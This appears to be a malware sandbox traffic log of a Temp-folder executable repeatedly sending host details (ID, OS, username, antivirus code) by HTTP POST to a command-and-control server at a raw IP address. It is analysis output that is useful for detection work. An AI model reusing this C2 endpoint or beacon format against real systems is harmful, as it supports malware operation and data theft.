Feb 7, 2023 19:58:41.853764057 CET	574	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:41.918071985 CET	574	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
349	192.168.2.5	50060	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:42.295231104 CET	575	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:42.361862898 CET	575	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49735	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:14.444183111 CET	163	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:14.507704973 CET	163	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
350	192.168.2.5	50061	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:42.609484911 CET	576	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:42.673573017 CET	576	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
351	192.168.2.5	50062	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:42.938577890 CET	577	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:43.007873058 CET	577	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
352	192.168.2.5	50063	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:43.919704914 CET	578	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:43.990259886 CET	578	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
353	192.168.2.5	50064	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:44.287580013 CET	579	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:44.354840040 CET	579	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
354	192.168.2.5	50065	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:45.626873970 CET	580	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:45.695127964 CET	580	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
355	192.168.2.5	50066	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:45.929274082 CET	581	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:45.993290901 CET	581	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
356	192.168.2.5	50067	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:46.185178995 CET	582	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:46.251833916 CET	582	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
357	192.168.2.5	50068	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:46.433814049 CET	583	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:46.499658108 CET	583	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
358	192.168.2.5	50069	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:46.668672085 CET	584	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:46.734369040 CET	584	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
359	192.168.2.5	50070	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:46.903603077 CET	585	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:46.968796968 CET	585	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49736	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:14.683729887 CET	164	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:14.750108004 CET	164	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
360	192.168.2.5	50071	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:47.153403044 CET	586	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:47.217680931 CET	586	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
361	192.168.2.5	50072	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:47.386919022 CET	587	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:47.452110052 CET	587	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
362	192.168.2.5	50073	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:47.629160881 CET	588	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:47.695662022 CET	588	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
363	192.168.2.5	50074	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:47.870198965 CET	589	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:47.933940887 CET	589	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
364	192.168.2.5	50075	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:48.119365931 CET	590	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:48.185590982 CET	590	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
365	192.168.2.5	50076	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:48.365767956 CET	591	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:48.428767920 CET	591	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
366	192.168.2.5	50077	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:48.624594927 CET	592	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:48.689368010 CET	592	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
367	192.168.2.5	50078	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:48.869935036 CET	593	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:48.936019897 CET	593	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
